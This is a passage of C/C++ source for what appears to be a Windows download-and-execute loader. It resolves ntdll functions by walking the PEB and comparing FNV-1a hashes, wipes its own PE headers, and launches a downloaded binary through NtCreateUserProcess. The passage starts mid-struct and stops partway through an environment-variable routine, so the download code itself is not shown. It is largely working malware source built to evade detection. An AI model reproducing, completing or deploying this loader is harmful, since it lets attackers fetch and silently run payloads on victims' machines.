  744.                     UCHAR SpareBits2 : 8;
  745.                     USHORT SpareBits3 : 16;
  746.                 } s2;
  747.             } u2;
  748.             HANDLE FileHandle;
  749.             HANDLE SectionHandle;
  750.             ULONGLONG UserProcessParametersNative;
  751.             ULONG UserProcessParametersWow64;
  752.             ULONG CurrentParameterFlags;
  753.             ULONGLONG PebAddressNative;
  754.             ULONG PebAddressWow64;
  755.             ULONGLONG ManifestAddress;
  756.             ULONG ManifestSize;
  757.         } SuccessState;
  758.     };
  759. } PS_CREATE_INFO, * PPS_CREATE_INFO;
  760.  
  761. typedef NTSTATUS(NTAPI* NTCREATEUSERPROCESS)(PHANDLE, PHANDLE, ACCESS_MASK, ACCESS_MASK, POBJECT_ATTRIBUTES, POBJECT_ATTRIBUTES, ULONG, ULONG, PRTL_USER_PROCESS_PARAMETERS, PPS_CREATE_INFO, PPS_ATTRIBUTE_LIST);
  762. typedef NTSTATUS(NTAPI* LDRLOADDLL)(PWSTR, PULONG, PUNICODE_STRING, PVOID);
  763. typedef NTSTATUS(NTAPI* NTCREATEFILE)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, PLARGE_INTEGER, ULONG, ULONG, ULONG, ULONG, PVOID, ULONG);
  764. typedef NTSTATUS(NTAPI* NTCLOSE)(HANDLE);
  765. typedef NTSTATUS(NTAPI* NTWRITEFILE)(HANDLE, HANDLE, PVOID, PVOID, PIO_STATUS_BLOCK, PVOID, ULONG, PLARGE_INTEGER, PULONG);
  766. typedef NTSTATUS(NTAPI* NTALLOCATEVIRTUALMEMORY)(HANDLE, PVOID, ULONG_PTR, PSIZE_T, ULONG, ULONG);
  767. typedef NTSTATUS(NTAPI* NTFREEVIRTUALMEMORY)(HANDLE, PVOID, PSIZE_T, ULONG);
  768. typedef NTSTATUS(NTAPI* NTDEVICEIOCONTROLFILE)(HANDLE, HANDLE, PVOID, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
  769. typedef NTSTATUS(NTAPI* NTTERMINATEPROCESS)(HANDLE, ULONG);
  770.  
  771.  
  772. typedef HRESULT(WINAPI* COINITIALIZEEX)(LPVOID, DWORD);
  773. typedef VOID(WINAPI* COUNINITIALIZE)(VOID);
  774. typedef HRESULT(WINAPI* COCREATEINSTANCE)(REFCLSID, LPUNKNOWN, DWORD, REFIID, LPVOID*);
  775. typedef HRESULT(WINAPI* COINITIALIZESECURITY)(PSECURITY_DESCRIPTOR, LONG, PSOLE_AUTHENTICATION_SERVICE, PVOID, DWORD, DWORD, PVOID, DWORD, PVOID);
  776.  
  777. typedef VOID(WINAPI* SYSFREESTRING)(BSTR);
  778.  
  779. typedef enum SWITCH_FUNCTIONS {
  780.     EntryPoint,                             //0
  781.     GetGeneralInformation,                  //1
  782.     GetNtdllBaseAddress,                    //2
  783.     ExitApplication,                        //3
  784.     HashStringFowlerNollVoVariant1aW,       //4
  785.     GetProcAddressByHash,                   //5
  786.     RtlLoadPeHeaders,                       //6
  787.     CharStringToWCharString,                //7
  788.     StringLength,                           //8
  789.     ExecuteBinary,                          //9
  790.     PopulateNtFunctionPointers,             //10
  791.     CreateProcessParameters,                //11
  792.     CopyParameters,                         //12
  793.     QueryEnvironmentVariables,              //13
  794.     NullPeHeaders,                          //14
  795.     CreateDownloadPath,                     //15
  796.     PopulateComFunctionPointers,            //16
  797.     GetTickCountAsDword,                    //17
  798.     DownloadBinary,                         //18
  799.     LoadComLibraries,                       //19
  800.     GetSysFreeString,                       //20
  801.     UnloadDll,                              //21
  802.     RemoveListEntry,                        //22
  803.     RemoveComData,                          //23
  804.     CheckRemoteHost,                        //24
  805.     SafelyExitCom,                          //25
  806.     CheckLocalMachinesInternetStatus,       //26
  807.     ZeroFillData,                           //27
  808.     Win32FromHResult                        //28
  809. }SWITCH_FUNCTIONS, *PSWITCH_FUNCTIONS;
  810.  
  811. typedef struct _COPY_PARAMETERS {
  812.     PWSTR d;
  813.     PUNICODE_STRING Destination;
  814.     PUNICODE_STRING Source;
  815.     ULONG Size;
  816. }COPY_PARAMETERS, *PCOPY_PARAMETERS;
  817.  
  818. typedef struct _ENVIRONMENT_DATA {
  819.     UNICODE_STRING Name;
  820.     PWSTR Environment;
  821. }ENVIRONMENT_DATA, *PENVIRONMENT_DATA;
  822.  
  823. typedef struct COM_FUNCTIONS{
  824.     COINITIALIZEEX CoInitializeEx;
  825.     COUNINITIALIZE CoUninitialize;
  826.     COCREATEINSTANCE CoCreateInstance;
  827.     SYSFREESTRING SysFreeString;
  828.     COINITIALIZESECURITY CoInitializeSecurity;
  829. }COM_FUNCTIONS, *PCOM_FUNCTIONS;
  830.  
  831. typedef struct NT_FUNCTIONS {
  832.     NTCREATEUSERPROCESS NtCreateUserProcess;
  833.     LDRLOADDLL LdrLoadDll;
  834.     NTCREATEFILE NtCreateFile;
  835.     NTCLOSE NtClose;
  836.     NTWRITEFILE NtWriteFile;
  837.     NTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory;
  838.     NTFREEVIRTUALMEMORY NtFreeVirtualMemory;
  839.     NTDEVICEIOCONTROLFILE NtDeviceIoControlFile;
  840.     NTTERMINATEPROCESS NtTerminateProcess;
  841. }NT_FUNCTIONS, *PNT_FUNCTIONS;
  842.  
  843. typedef struct COM_VARIABLES {
  844.     IWbemLocator* Locator;
  845.     IWbemServices* Services;
  846.     IEnumWbemClassObject* Enum;
  847.     IWbemClassObject* Ping;
  848.     INetworkListManager* NetworkManager;
  849.     IWinHttpRequest* HttpRequest;
  850.     BSTR ResponseData;
  851. }COM_VARIABLES, *PCOM_VARIABLES;
  852.  
  853. typedef struct COM_HELPER {
  854.     BOOL IsComInitialized;
  855.     HRESULT ComResult;
  856.     COM_FUNCTIONS ComFunction;
  857.     COM_VARIABLES ComVariables;
  858. }COM_HELPER, *PCOM_HELPER;
  859.  
  860. typedef struct LOADER_HELPER {
  861.     HMODULE hMod;
  862.     PIMAGE_DOS_HEADER Dos;
  863.     PIMAGE_NT_HEADERS Nt;
  864.     PIMAGE_FILE_HEADER File;
  865.     PIMAGE_OPTIONAL_HEADER Optional;
  866. }LOADER_HELPER, *PLOADER_HELPER;
  867.  
  868.  
  869. typedef struct DATA_TABLE {
  870.     PWCHAR WideStringPointer1;
  871.     PCHAR StringPointer1;
  872.     UNICODE_STRING UnicodeString;
  873.     WCHAR UnicodeStringBuffer[MAX_PATH * sizeof(WCHAR)];
  874.     PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
  875.     PVOID UserProcessParametersBuffer[4096];
  876.     PVOID Destination;
  877. }DATA_TABLE, *PDATA_TABLE;
  878.  
  879. typedef struct ZERO_FILL_HELPER {
  880.     PVOID Destination;
  881.     SIZE_T Size;
  882. }ZERO_FILL_HELPER, *PZERO_FILL_HELPER;
  883.  
  884. typedef struct _VARIABLE_TABLE {
  885.     NTSTATUS Status;
  886.     BOOL bFlag;
  887.     DWORD64 dwError;
  888.     PPEB Peb;
  889.     PTEB Teb;
  890.    
  891.     //Function calling
  892.     DWORD dwReturn;
  893.     DWORD dwGeneralUsage1;
  894.  
  895.     //helper structures
  896.     COPY_PARAMETERS Copy;
  897.     ENVIRONMENT_DATA EnvironmentData;
  898.     HANDLE hHandle;
  899.     PLIST_ENTRY Entry;
  900.  
  901.     //Functions
  902.     DATA_TABLE GeneralData;
  903.     NT_FUNCTIONS NtFunctions;
  904.     LOADER_HELPER LoaderHelper;
  905.     COM_HELPER ComHelper;
  906.     ZERO_FILL_HELPER ZeroFill;
  907.  
  908. }VARIABLE_TABLE, *PVARIABLE_TABLE;
  909.  
  910. LPVOID RecursiveExecutor(DWORD dwEnum, PVARIABLE_TABLE Table)
  911. {
  912.     if (Table->dwError != ERROR_SUCCESS || Table->Status != STATUS_SUCCESS)
  913.         return (LPVOID)Table->dwError;
  914.  
  915.     switch (dwEnum)
  916.     {
  917.         case EntryPoint:
  918.         {
  919.             Table->ZeroFill.Destination = Table;
  920.             Table->ZeroFill.Size = sizeof(VARIABLE_TABLE);
  921.             RecursiveExecutor(ZeroFillData, Table);
  922.  
  923.             Table->dwError = 0; Table->dwGeneralUsage1 = 0;
  924.  
  925.             RecursiveExecutor(GetGeneralInformation, Table);
  926.        
  927.             Table->GeneralData.UnicodeString.Buffer = Table->GeneralData.UnicodeStringBuffer;
  928.             Table->GeneralData.UnicodeString.Length = (MAX_PATH * sizeof(WCHAR));
  929.             Table->GeneralData.UnicodeString.MaximumLength = (MAX_PATH * sizeof(WCHAR) + 1);
  930.  
  931.             RecursiveExecutor(CreateDownloadPath, Table);
  932.  
  933.             RecursiveExecutor(DownloadBinary, Table);
  934.  
  935.             RecursiveExecutor(ExecuteBinary, Table);
  936.  
  937.             RecursiveExecutor(ExitApplication, Table);
  938.  
  939.             break;
  940.         }
  941.  
  942.         case GetGeneralInformation:
  943.         {
  944.             Table->Teb = (PTEB)__readgsqword(0x30);
  945.             Table->Peb = (PPEB)Table->Teb->ProcessEnvironmentBlock;
  946.  
  947.             Table->dwGeneralUsage1 = 0xa62a3b3b;
  948.             RecursiveExecutor(GetNtdllBaseAddress, Table);
  949.  
  950.             RecursiveExecutor(NullPeHeaders, Table);
  951.  
  952.             break;
  953.         }
  954.  
  955.         case GetNtdllBaseAddress:
  956.         {
  957.             PLDR_MODULE Module = NULL;
  958.             PLIST_ENTRY Head = &Table->Peb->LoaderData->InMemoryOrderModuleList;
  959.             PLIST_ENTRY Next = Head->Flink;
  960.             Module = (PLDR_MODULE)((PBYTE)Next - 16);
  961.  
  962.             while (Next != Head)
  963.             {
  964.                 Module = (PLDR_MODULE)((PBYTE)Next - 16);
  965.                 if (Module->BaseDllName.Buffer != NULL)
  966.                 {
  967.                     Table->GeneralData.WideStringPointer1 = Module->BaseDllName.Buffer;
  968.  
  969.                     RecursiveExecutor(HashStringFowlerNollVoVariant1aW, Table);
  970.  
  971.                     if (Table->dwReturn == Table->dwGeneralUsage1)
  972.                     {
  973.                         Table->LoaderHelper.hMod = (HMODULE)Module->BaseAddress;
  974.                         RecursiveExecutor(PopulateNtFunctionPointers, Table);
  975.  
  976.                         if (!Table->NtFunctions.NtCreateUserProcess || !Table->NtFunctions.LdrLoadDll)
  977.                             RecursiveExecutor(ExitApplication, Table);
  978.  
  979.                         if(!Table->NtFunctions.NtClose || !Table->NtFunctions.NtCreateFile)
  980.                             RecursiveExecutor(ExitApplication, Table);
  981.  
  982.                         if(!Table->NtFunctions.NtWriteFile || !Table->NtFunctions.NtAllocateVirtualMemory)
  983.                             RecursiveExecutor(ExitApplication, Table);
  984.  
  985.                         if(!Table->NtFunctions.NtFreeVirtualMemory || !Table->NtFunctions.NtTerminateProcess)
  986.                             RecursiveExecutor(ExitApplication, Table);
  987.                        
  988.                         break;
  989.                     }
  990.                 }
  991.  
  992.                 Next = Next->Flink;
  993.             }
  994.  
  995.             break;
  996.         }
  997.  
  998.         case ExitApplication:
  999.         {
  1000.             if (!Table->NtFunctions.NtTerminateProcess)
  1001.                 while (TRUE); //fatal error...
  1002.  
  1003.             if (Table->ComHelper.ComResult == S_OK || Table->Status == STATUS_SUCCESS)
  1004.                 Table->dwError = ERROR_INVALID_DATA;
  1005.  
  1006.             if (Table->Status != STATUS_SUCCESS)
  1007.                 Table->dwError = ERROR_PRINTQ_FULL; //lol
  1008.  
  1009.             if (Table->ComHelper.ComResult != S_OK)
  1010.                 RecursiveExecutor(Win32FromHResult, Table);
  1011.  
  1012.             if (Table->ComHelper.IsComInitialized)
  1013.             {
  1014.                 RecursiveExecutor(SafelyExitCom, Table);
  1015.                 Table->ComHelper.ComFunction.CoUninitialize();
  1016.  
  1017.                 RecursiveExecutor(RemoveComData, Table);
  1018.  
  1019.                 Table->ComHelper.IsComInitialized = FALSE;
  1020.             }
  1021.  
  1022.             Table->NtFunctions.NtTerminateProcess(NULL, Table->dwError);
  1023.             Table->NtFunctions.NtTerminateProcess(((HANDLE)-1), Table->dwError);
  1024.                
  1025.             return (LPVOID)Table->dwError;
  1026.         }
  1027.  
  1028.         case HashStringFowlerNollVoVariant1aW:
  1029.         {
  1030.             ULONG Hash = 0x811c9dc5;
  1031.  
  1032.             while (*Table->GeneralData.WideStringPointer1)
  1033.             {
  1034.                 Hash ^= (UCHAR)*Table->GeneralData.WideStringPointer1++;
  1035.                 Hash *= 0x01000193;
  1036.             }
  1037.  
  1038.             Table->dwReturn = Hash;
  1039.  
  1040.             break;
  1041.         }
  1042.  
  1043.         case GetProcAddressByHash:
  1044.         {
  1045.             PBYTE pFunctionName = NULL;
  1046.             DWORD64 FunctionAddress = ERROR_SUCCESS;
  1047.             PIMAGE_EXPORT_DIRECTORY ExportTable = NULL;
  1048.             PDWORD FunctionNameAddressArray;
  1049.             PDWORD FunctionAddressArray;
  1050.             PWORD FunctionOrdinalAddressArray;
  1051.  
  1052.             RecursiveExecutor(RtlLoadPeHeaders, Table);
  1053.             if (Table->LoaderHelper.Nt->Signature != IMAGE_NT_SIGNATURE)
  1054.                 RecursiveExecutor(ExitApplication, Table);
  1055.  
  1056.             ExportTable = (PIMAGE_EXPORT_DIRECTORY)((DWORD64)Table->LoaderHelper.hMod + Table->LoaderHelper.Optional->DataDirectory[0].VirtualAddress);
  1057.             FunctionNameAddressArray = (PDWORD)((LPBYTE)Table->LoaderHelper.hMod + ExportTable->AddressOfNames);
  1058.             FunctionAddressArray = (PDWORD)((LPBYTE)Table->LoaderHelper.hMod + ExportTable->AddressOfFunctions);
  1059.             FunctionOrdinalAddressArray = (PWORD)((LPBYTE)Table->LoaderHelper.hMod + ExportTable->AddressOfNameOrdinals);
  1060.  
  1061.             for (DWORD dwX = 0; dwX < ExportTable->NumberOfNames; dwX++)
  1062.             {
  1063.                 pFunctionName = FunctionNameAddressArray[dwX] + (PBYTE)Table->LoaderHelper.hMod;
  1064.                 WCHAR wFunctionName[MAX_PATH * sizeof(WCHAR)];
  1065.  
  1066.                 Table->ZeroFill.Destination = &wFunctionName;
  1067.                 Table->ZeroFill.Size = sizeof(wFunctionName);
  1068.                 RecursiveExecutor(ZeroFillData, Table);
  1069.  
  1070.                 Table->GeneralData.StringPointer1 = (PCHAR)pFunctionName;
  1071.                 Table->GeneralData.WideStringPointer1 = wFunctionName;
  1072.  
  1073.                 RecursiveExecutor(CharStringToWCharString, Table);
  1074.  
  1075.                 Table->GeneralData.WideStringPointer1 = wFunctionName;
  1076.  
  1077.                 RecursiveExecutor(HashStringFowlerNollVoVariant1aW, Table);
  1078.  
  1079.                 if (Table->dwGeneralUsage1 == Table->dwReturn)
  1080.                     return (LPVOID)((DWORD64)Table->LoaderHelper.hMod + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
  1081.             }
  1082.  
  1083.             break;
  1084.         }
  1085.  
  1086.         case RtlLoadPeHeaders:
  1087.         {
  1088.             Table->LoaderHelper.Dos = (PIMAGE_DOS_HEADER)Table->LoaderHelper.hMod;
  1089.             if (Table->LoaderHelper.Dos->e_magic != IMAGE_DOS_SIGNATURE)
  1090.                 break;
  1091.  
  1092.             Table->LoaderHelper.Nt = (PIMAGE_NT_HEADERS)((PBYTE)Table->LoaderHelper.Dos + Table->LoaderHelper.Dos->e_lfanew);
  1093.             if (Table->LoaderHelper.Nt->Signature != IMAGE_NT_SIGNATURE)
  1094.                 break;
  1095.  
  1096.             Table->LoaderHelper.File = (PIMAGE_FILE_HEADER)((PBYTE)Table->LoaderHelper.hMod + Table->LoaderHelper.Dos->e_lfanew + sizeof(DWORD));
  1097.             Table->LoaderHelper.Optional = (PIMAGE_OPTIONAL_HEADER)((PBYTE)Table->LoaderHelper.File + sizeof(IMAGE_FILE_HEADER));
  1098.  
  1099.             break;
  1100.         }
  1101.  
  1102.         case CharStringToWCharString:
  1103.         {
  1104.             INT MaxLength = 256;
  1105.             INT Length = MaxLength;
  1106.  
  1107.             while (--Length >= 0)
  1108.             {
  1109.                 if (!(*Table->GeneralData.WideStringPointer1++ = *Table->GeneralData.StringPointer1++))
  1110.                     return (LPVOID)(DWORD64)(MaxLength - Length - 1);
  1111.             }
  1112.  
  1113.             return (LPVOID)(DWORD64)(MaxLength - Length);
  1114.         }
  1115.  
  1116.         case StringLength:
  1117.         {
  1118.             LPCWSTR String2;
  1119.  
  1120.             for (String2 = Table->GeneralData.WideStringPointer1; *String2; ++String2);
  1121.  
  1122.             Table->dwGeneralUsage1 = static_cast<DWORD>(String2 - Table->GeneralData.WideStringPointer1);
  1123.  
  1124.             break;
  1125.         }
  1126.  
  1127.         case ExecuteBinary:
  1128.         {
  1129.             UNICODE_STRING NtPathOfBinary;
  1130.             PPS_ATTRIBUTE_LIST AttributeList = NULL;
  1131.             HANDLE hHandle = NULL, hThread = NULL;
  1132.             PS_CREATE_INFO CreateInfo;
  1133.             DWORD dwOffset = 0;
  1134.             WCHAR PathBufferW[MAX_PATH * sizeof(WCHAR)];
  1135.             PVOID PsAttributesBuffer[32];
  1136.  
  1137.             Table->ZeroFill.Destination = &NtPathOfBinary;
  1138.             Table->ZeroFill.Size = sizeof(UNICODE_STRING);
  1139.             RecursiveExecutor(ZeroFillData, Table);
  1140.  
  1141.             Table->ZeroFill.Destination = &CreateInfo;
  1142.             Table->ZeroFill.Size = sizeof(PS_CREATE_INFO);
  1143.             RecursiveExecutor(ZeroFillData, Table);
  1144.  
  1145.             Table->ZeroFill.Destination = &PathBufferW;
  1146.             Table->ZeroFill.Size = sizeof(PathBufferW);
  1147.             RecursiveExecutor(ZeroFillData, Table);
  1148.  
  1149.             Table->ZeroFill.Destination = &PsAttributesBuffer;
  1150.             Table->ZeroFill.Size = sizeof(PsAttributesBuffer);
  1151.             RecursiveExecutor(ZeroFillData, Table);
  1152.  
  1153.             CreateInfo.Size = sizeof(CreateInfo);
  1154.             CreateInfo.State = PsCreateInitialState;
  1155.  
  1156.             RecursiveExecutor(CreateProcessParameters, Table);
  1157.  
  1158.             AttributeList = (PPS_ATTRIBUTE_LIST)PsAttributesBuffer;
  1159.             AttributeList->TotalLength = sizeof(PS_ATTRIBUTE_LIST) - sizeof(PS_ATTRIBUTE);
  1160.             AttributeList->Attributes[0].Attribute = PS_ATTRIBUTE_IMAGE_NAME;
  1161.             AttributeList->Attributes[0].Size = Table->GeneralData.UnicodeString.Length;
  1162.             AttributeList->Attributes[0].Value = (ULONG_PTR)Table->GeneralData.UnicodeString.Buffer;
  1163.  
  1164.             Table->Status = Table->NtFunctions.NtCreateUserProcess(&hHandle, &hThread, PROCESS_ALL_ACCESS, THREAD_ALL_ACCESS, NULL, NULL, NULL, NULL, Table->GeneralData.ProcessParameters, & CreateInfo, AttributeList);
  1165.             if (!NT_SUCCESS(Table->Status))
  1166.                 break;
  1167.  
  1168.             break;
  1169.         }
  1170.  
  1171.         case PopulateNtFunctionPointers:
  1172.         {
  1173.             Table->dwGeneralUsage1 = 0x116893e9; //NtCreateUserProcess
  1174.             Table->NtFunctions.NtCreateUserProcess = (NTCREATEUSERPROCESS)RecursiveExecutor(GetProcAddressByHash, Table);
  1175.  
  1176.             Table->dwGeneralUsage1 = 0x7b566b5f; //LdrLoadDll
  1177.             Table->NtFunctions.LdrLoadDll = (LDRLOADDLL)RecursiveExecutor(GetProcAddressByHash, Table);
  1178.  
  1179.             Table->dwGeneralUsage1 = 0xa9c5b599; //NtCreateFile
  1180.             Table->NtFunctions.NtCreateFile = (NTCREATEFILE)RecursiveExecutor(GetProcAddressByHash, Table);
  1181.  
  1182.             Table->dwGeneralUsage1 = 0x6b372c05; //MtClose
  1183.             Table->NtFunctions.NtClose = (NTCLOSE)RecursiveExecutor(GetProcAddressByHash, Table);
  1184.  
  1185.             Table->dwGeneralUsage1 = 0xf67464e4; //NtWriteFile
  1186.             Table->NtFunctions.NtWriteFile = (NTWRITEFILE)RecursiveExecutor(GetProcAddressByHash, Table);
  1187.  
  1188.             Table->dwGeneralUsage1 = 0xca67b978; //NtAllocateVirtualMemory
  1189.             Table->NtFunctions.NtAllocateVirtualMemory = (NTALLOCATEVIRTUALMEMORY)RecursiveExecutor(GetProcAddressByHash, Table);
  1190.  
  1191.             Table->dwGeneralUsage1 = 0xb51cc567; //NtFreeVirtualMemory
  1192.             Table->NtFunctions.NtFreeVirtualMemory = (NTFREEVIRTUALMEMORY)RecursiveExecutor(GetProcAddressByHash, Table);
  1193.  
  1194.             Table->dwGeneralUsage1 = 0x08ac8bac; //NtDeviceIoControlFile
  1195.             Table->NtFunctions.NtDeviceIoControlFile = (NTDEVICEIOCONTROLFILE)RecursiveExecutor(GetProcAddressByHash, Table);
  1196.  
  1197.             Table->dwGeneralUsage1 = 0x1f2f8e87; //NtTerminateProcess
  1198.             Table->NtFunctions.NtTerminateProcess = (NTTERMINATEPROCESS)RecursiveExecutor(GetProcAddressByHash, Table);
  1199.  
  1200.             break;
  1201.         }
  1202.  
  1203.         case CreateProcessParameters:
  1204.         {
  1205.             UNICODE_STRING EmptyString;
  1206.             PUNICODE_STRING DllPath = NULL;
  1207.             PUNICODE_STRING CurrentDirectory = NULL;
  1208.             PUNICODE_STRING CommandLine = NULL;
  1209.             PUNICODE_STRING WindowTitle = NULL;
  1210.             PUNICODE_STRING DesktopInfo = NULL;
  1211.             PUNICODE_STRING ShellInfo = NULL;
  1212.             PUNICODE_STRING RuntimeData = NULL;
  1213.             PVOID Environment = NULL;
  1214.             PRTL_USER_PROCESS_PARAMETERS p = NULL, ProcessParameters = NULL;
  1215.             HANDLE hHandle = NULL;
  1216.             PWSTR d = NULL;
  1217.             ULONG Size = 0;
  1218.  
  1219.             PWCHAR ImagePathNameBuffer = NULL;
  1220.             USHORT ImagePathNameBufferLength;
  1221.             UNICODE_STRING ImagePathName;
  1222.  
  1223.             Table->ZeroFill.Destination = &EmptyString;
  1224.             Table->ZeroFill.Size = sizeof(UNICODE_STRING);
  1225.             RecursiveExecutor(ZeroFillData, Table);
  1226.  
  1227.             Table->ZeroFill.Destination = &ImagePathName;
  1228.             Table->ZeroFill.Size = sizeof(UNICODE_STRING);
  1229.             RecursiveExecutor(ZeroFillData, Table);
  1230.            
  1231.             ImagePathNameBuffer = Table->GeneralData.UnicodeString.Buffer;
  1232.             ImagePathNameBufferLength = Table->GeneralData.UnicodeString.Length;
  1233.  
  1234.             while (*ImagePathNameBuffer != 'C')
  1235.             {
  1236. #pragma warning( push )
  1237. #pragma warning( disable : 6269)
  1238.                 *ImagePathNameBuffer++;
  1239. #pragma warning( pop )
  1240.                 ImagePathName.Length--;
  1241.  
  1242.             }
  1243.  
  1244.             ProcessParameters = Table->Peb->ProcessParameters;
  1245.  
  1246.             ImagePathName.Buffer = ImagePathNameBuffer;
  1247.             ImagePathName.Length = ImagePathNameBufferLength;
  1248.             ImagePathName.MaximumLength = ImagePathName.Length + sizeof(WCHAR);
  1249.  
  1250.             CommandLine = &ImagePathName;
  1251.             WindowTitle = &EmptyString;
  1252.             DesktopInfo = &EmptyString;
  1253.             ShellInfo = &EmptyString;
  1254.             RuntimeData = &EmptyString;
  1255.  
  1256.             Size = sizeof(*ProcessParameters);
  1257.             Size += AlignProcessParameters(MAX_PATH * sizeof(WCHAR), sizeof(ULONG));
  1258.             Size += AlignProcessParameters(ImagePathName.Length + sizeof(UNICODE_NULL), sizeof(ULONG));
  1259.             Size += AlignProcessParameters(CommandLine->Length + sizeof(UNICODE_NULL), sizeof(ULONG));
  1260.             Size += AlignProcessParameters(WindowTitle->MaximumLength, sizeof(ULONG));
  1261.             Size += AlignProcessParameters(DesktopInfo->MaximumLength, sizeof(ULONG));
  1262.             Size += AlignProcessParameters(ShellInfo->MaximumLength, sizeof(ULONG));
  1263.             Size += AlignProcessParameters(RuntimeData->MaximumLength, sizeof(ULONG));
  1264.  
  1265.             DllPath = &ProcessParameters->DllPath;
  1266.  
  1267.             hHandle = (HANDLE)((ULONG_PTR)ProcessParameters->CurrentDirectory.Handle & ~OBJ_HANDLE_TAGBITS);
  1268.             hHandle = (HANDLE)((ULONG_PTR)hHandle | RTL_USER_PROC_CURDIR_INHERIT);
  1269.             CurrentDirectory = &ProcessParameters->CurrentDirectory.DosPath;
  1270.  
  1271.             Environment = ProcessParameters->Environment;
  1272.  
  1273.             Size += AlignProcessParameters(DllPath->MaximumLength, sizeof(ULONG));
  1274.  
  1275.             p = (PRTL_USER_PROCESS_PARAMETERS)Table->GeneralData.UserProcessParametersBuffer;
  1276.             p->MaximumLength = Size;
  1277.             p->Length = Size;
  1278.             p->Flags = RTL_USER_PROC_PARAMS_NORMALIZED;
  1279.             p->DebugFlags = 0;
  1280.             p->Environment = (PWSTR)Environment;
  1281.             p->CurrentDirectory.Handle = hHandle;
  1282.             p->ConsoleFlags = ProcessParameters->ConsoleFlags;
  1283.  
  1284.             Table->Copy.d = (PWSTR)(p + 1);
  1285.  
  1286.             Table->Copy.Destination = &p->CurrentDirectory.DosPath;
  1287.             Table->Copy.Source = CurrentDirectory;
  1288.             Table->Copy.Size = MAX_PATH * 2;
  1289.             RecursiveExecutor(CopyParameters, Table);
  1290.  
  1291.             Table->Copy.Destination = &p->DllPath;
  1292.             Table->Copy.Source = DllPath;
  1293.             Table->Copy.Size = 0;
  1294.             RecursiveExecutor(CopyParameters, Table);
  1295.  
  1296.             Table->Copy.Destination = &p->ImagePathName;
  1297.             Table->Copy.Source = &ImagePathName;
  1298.             Table->Copy.Size = ImagePathName.Length + sizeof(UNICODE_NULL);
  1299.             RecursiveExecutor(CopyParameters, Table);
  1300.  
  1301.             Table->Copy.Destination = &p->CommandLine;
  1302.             Table->Copy.Source = CommandLine;
  1303.  
  1304.             if (CommandLine->Length == CommandLine->MaximumLength)
  1305.                 Table->Copy.Size = 0;
  1306.             else
  1307.                 Table->Copy.Size = CommandLine->Length + sizeof(UNICODE_NULL);
  1308.  
  1309.             RecursiveExecutor(CopyParameters, Table);
  1310.  
  1311.             Table->Copy.Destination = &p->WindowTitle;
  1312.             Table->Copy.Source = WindowTitle;
  1313.             Table->Copy.Size = 0;
  1314.             RecursiveExecutor(CopyParameters, Table);
  1315.  
  1316.             Table->Copy.Destination = &p->DesktopInfo;
  1317.             Table->Copy.Source = DesktopInfo;
  1318.             Table->Copy.Size = 0;
  1319.             RecursiveExecutor(CopyParameters, Table);
  1320.  
  1321.             Table->Copy.Destination = &p->ShellInfo;
  1322.             Table->Copy.Source = ShellInfo;
  1323.             Table->Copy.Size = 0;
  1324.             RecursiveExecutor(CopyParameters, Table);
  1325.  
  1326.             if (RuntimeData->Length != 0)
  1327.             {
  1328.                 Table->Copy.Destination = &p->RuntimeData;
  1329.                 Table->Copy.Source = RuntimeData;
  1330.                 Table->Copy.Size = 0;
  1331.             }
  1332.  
  1333.             p->DllPath.Buffer = NULL;
  1334.             p->DllPath.Length = 0;
  1335.             p->DllPath.MaximumLength = 0;
  1336.             p->EnvironmentSize = Table->Peb->ProcessParameters->EnvironmentSize;
  1337.  
  1338.             Table->GeneralData.ProcessParameters = p;
  1339.             p = NULL;
  1340.  
  1341.             break;
  1342.         }
  1343.  
  1344.         case CopyParameters:
  1345.         {
  1346.             if (Table->Copy.Size == 0)
  1347.                 Table->Copy.Size = Table->Copy.Source->MaximumLength;
  1348.  
  1349.             Table->dwGeneralUsage1 = Table->Copy.Source->Length;
  1350.             for (PBYTE Destination = (PBYTE)Table->Copy.d, Source = (PBYTE)Table->Copy.Source->Buffer; Table->dwGeneralUsage1--;)
  1351.             {
  1352.                 *Destination++ = *Source++;
  1353.             }
  1354.  
  1355.             Table->Copy.Destination->Buffer = Table->Copy.d;
  1356.             Table->Copy.Destination->Length = Table->Copy.Source->Length;
  1357.             Table->Copy.Destination->MaximumLength = (USHORT)Table->Copy.Size;
  1358.  
  1359.             if (Table->Copy.Destination->Length < Table->Copy.Destination->MaximumLength)
  1360.             {
  1361.                 Table->dwGeneralUsage1 = Table->Copy.Destination->MaximumLength - Table->Copy.Destination->Length;
  1362.                 for (PULONG Destination = (PULONG)((PBYTE)Table->Copy.Destination->Buffer) + Table->Copy.Destination->Length; Table->dwGeneralUsage1 > 0; Table->dwGeneralUsage1--, Destination++)
  1363.                     *Destination = 0;
  1364.             }
  1365.  
  1366.             Table->Copy.d = (PWSTR)((PCHAR)(Table->Copy.d) + AlignProcessParameters(Table->Copy.Size, sizeof(ULONG)));
  1367.             break;
  1368.         }
  1369.  
  1370.         case QueryEnvironmentVariables:
  1371.         {
  1372.             UNICODE_STRING TemporaryString;;
  1373.             PWSTR Value = 0;
  1374.  
  1375.             Table->ZeroFill.Destination = &TemporaryString;
  1376.             Table->ZeroFill.Size = sizeof(UNICODE_STRING);
  1377.             RecursiveExecutor(ZeroFillData, Table);
  1378.  
  1379.             Table->GeneralData.UnicodeString.Length = 0;
  1380.  
  1381.             for (PWCHAR String = Table->EnvironmentData.Environment; *String; String++)
  1382.             {
  1383.                 TemporaryString.Buffer = String++;
  1384.                 Table->GeneralData.WideStringPointer1 = String;
  1385.  
  1386.                 String = NULL;
  1387.                 do
  1388.                 {
  1389.                     if (*Table->GeneralData.WideStringPointer1 == L'=')
  1390.                     {
  1391.                         String = Table->GeneralData.WideStringPointer1;
  1392.                         break;
  1393.                     }
  1394.  
  1395.                 } while (*Table->GeneralData.WideStringPointer1++);
  1396.  
  1397.  
  1398.                 if (String == NULL)
  1399.                 {
  1400.                     Table->GeneralData.WideStringPointer1 = TemporaryString.Buffer;
  1401.                     RecursiveExecutor(StringLength, Table);
  1402.                     String = TemporaryString.Buffer + Table->dwGeneralUsage1;
  1403.                 }
  1404.  
  1405.                 if (*String)
  1406.                 {
  1407.                     TemporaryString.MaximumLength = (USHORT)(String - TemporaryString.Buffer) * sizeof(WCHAR);
  1408.                     TemporaryString.Length = TemporaryString.MaximumLength;
  1409.  
  1410.                     Value = ++String;
